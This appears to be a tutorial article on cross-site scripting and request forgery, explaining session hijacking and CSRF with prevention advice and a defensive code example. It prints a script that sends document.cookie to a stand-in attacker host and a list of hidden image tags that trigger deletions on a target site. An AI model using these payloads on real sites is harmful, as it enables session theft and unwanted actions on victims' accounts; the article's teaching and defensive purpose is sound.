Basics of Cross Site Scripting (XSS) and XSRF

Cross site scripting leads to a number of security issues. The most important to remember are:

  • Session Hijacking - the hacker steals the user's session by obtaining his cookies and gains access to the user's account
  • Cross Site Request Forgery - the hacker uses the user's account to perform an operation that was never intended

XSS session hijacking by stealing cookies

If a hacker can execute JavaScript in your domain (for example formu.example.com) then he can inject something like this into your page:

<script>
document.write('<img src=\'http://hackers.host.fake.com/grab.php?s='+escape(document.cookie)+'\' />');
</script>

If you have a form or a page that takes a parameter from GET or POST and displays it in the response without escaping, you have an XSS hole.

Code like the above, executed in the user's browser, will send the current user's cookies to the hacker's server. The hacker collects these cookies, sets the session id in his own browser and pretends to be the victim. The web server would not know the difference: as long as the cookie carries the correct session id, the request is authenticated and the hacker can act with the victim's permissions.

Most frequently the attacker would encode the request somehow and lure the victim into clicking his link. The victim then goes to the target website, the XSS executes in the browser, sends the cookies, and the job is done. The only assumption is that the victim has to be logged in for this to work, as the attacker wants the session of a logged-in user.

A trickier and stealthier version of the attack is to place an invisible iframe. Then the user won't even have to click anything to open the target website. The user comes to your site and everything seems fine: there is some funny photo or whatever. On the same page there is an iframe that leads to the target website with the XSS request. The user's browser loads the iframe and requests the target page with the cookies for the target domain, then executes the XSS and sends the cookies to the hacker's server. This way the user never even sees that his account on the target website was compromised.

How to prevent XSS Session Hijacking attacks

To prevent this attack you should make sure it is not possible to inject any JavaScript into your site. You should also add server-side checks to make sure the user agent is checked, and preferably the IP address as well. That should make your site pretty much immune to session hijacking via XSS attacks.

The good thing about this attack is that you can prevent it quite successfully by checking the IP and user agent. If the hacker somehow got the cookies, you won't let him do anything, as the IP stored in the session won't match the IP of the request sender.
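The two server-side measures described above, shown as an added example rather than code from the original post: a parameter echoed into the page unescaped (the XSS hole) next to the same page rendered through an HTML escaper, and a session-binding check that compares the IP and User-Agent recorded at login against each later request. It assumes Node.js; the `renderUnsafe`, `renderSafe`, `escapeHtml` and `sessionMatches` names, the request objects and the `steal(...)` payload are all constructed for the example.

```javascript
// Added example, not from the original post. Assumes Node.js; the request and
// session objects below are constructed stand-ins for a real HTTP layer.

// Escape the five characters that let a parameter break out of HTML text or
// attribute context. Ampersand goes first so later replacements are not re-escaped.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The XSS hole the post describes: a GET parameter echoed straight into the page.
function renderUnsafe(query) {
  return `<p>Search results for: ${query.q}</p>`;
}

// The same page with the parameter escaped at the point of output: the browser
// now shows the payload as text instead of executing it.
function renderSafe(query) {
  return `<p>Search results for: ${escapeHtml(query.q)}</p>`;
}

// Session binding: the IP and User-Agent recorded at login must match every
// later request that presents the session cookie. A cookie replayed from
// another machine fails this check even though the session id is correct.
function sessionMatches(session, request) {
  return session.ip === request.ip && session.userAgent === request.userAgent;
}

// Constructed sample input: a script tag arriving in the q parameter.
const maliciousQuery = { q: '<script>steal(document.cookie)</script>' };

// Constructed session created at login, plus two later requests: one from the
// victim's own browser and one replaying the same cookie from elsewhere.
const session = { id: 'constructed-session-id', ip: '203.0.113.10', userAgent: 'ExampleBrowser/1.0' };
const victimRequest = { ip: '203.0.113.10', userAgent: 'ExampleBrowser/1.0' };
const replayRequest = { ip: '198.51.100.7', userAgent: 'OtherBrowser/2.0' };

function demo() {
  return {
    unsafe: renderUnsafe(maliciousQuery),          // contains a live <script> tag
    safe: renderSafe(maliciousQuery),              // contains only &lt;script&gt;
    victimAccepted: sessionMatches(session, victimRequest), // true
    replayAccepted: sessionMatches(session, replayRequest), // false
  };
}

console.log(demo());
```

Escaping is applied at output time, not when the value is stored, so the same stored string can be rendered safely in HTML and handled differently elsewhere. The binding check rejects a replayed cookie only when the replay comes from a different IP or browser, which is why the post treats it as a mitigation rather than a substitute for removing the injection.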

Cross Site Request Forgery - user's browser performs action that was not intended

This attack is extremely dangerous, and it is only in the last few years that it became well known, so there are still millions of websites exposed to XSRF attacks.

The idea of the XSRF attack lies in incorrect web application design. GET requests should never modify data, but web developers found it easier to place action links like delete or activate than to create forms for them. If you see something like

<a href="/delete_order.php?id=3">delete</a>

then the application is probably exposed to XSRF attacks. The point is that the delete URL is now a regular URL and it can be loaded as an image, an iframe or any other resource. The hacker then places something like this on his website (or on any web page):

<img src="http://target.site.com/delete_order.php?id=1" style="display: none;"/> 
<img src="http://target.site.com/delete_order.php?id=2" style="display: none;"/> 
<img src="http://target.site.com/delete_order.php?id=3" style="display: none;"/> 
<img src="http://target.site.com/delete_order.php?id=4" style="display: none;"/> 
...

The victim's browser sees a bunch of images, so it just starts loading them. It does not know that each of those image requests will try to delete an order on target.site.com. The worst part is that it is the victim's browser that sends the requests, so an IP check won't help you here at all.

Got it?

Once you realize how horrible it is, you will never let your app do such a thing again :-)

How to prevent XSRF attacks

XSRF attacks are based on the fact that the hacker can force the victim's browser to send requests with the victim's cookies etc.

There are 3 main methods of preventing the attack:

  • Use POST only – still not safe enough
  • Use single-use tokens in forms
  • Check request headers for AJAX calls

The best way is to use one-time tokens. Every form you show then carries a token which is valid only for a certain user and only for a limited time. It also cannot be reused, as it is regenerated every time you load the form.

The hacker would then need to force the browser to load the form, extract the token and submit it, but he would not be able to do that without an XSS flaw in your site, and even then it would be much more difficult.

More reading on XSS

An awesome website showing most XSS encoding attacks – how to encode your JS to get it executed in the browser.

XSRF on wikipedia
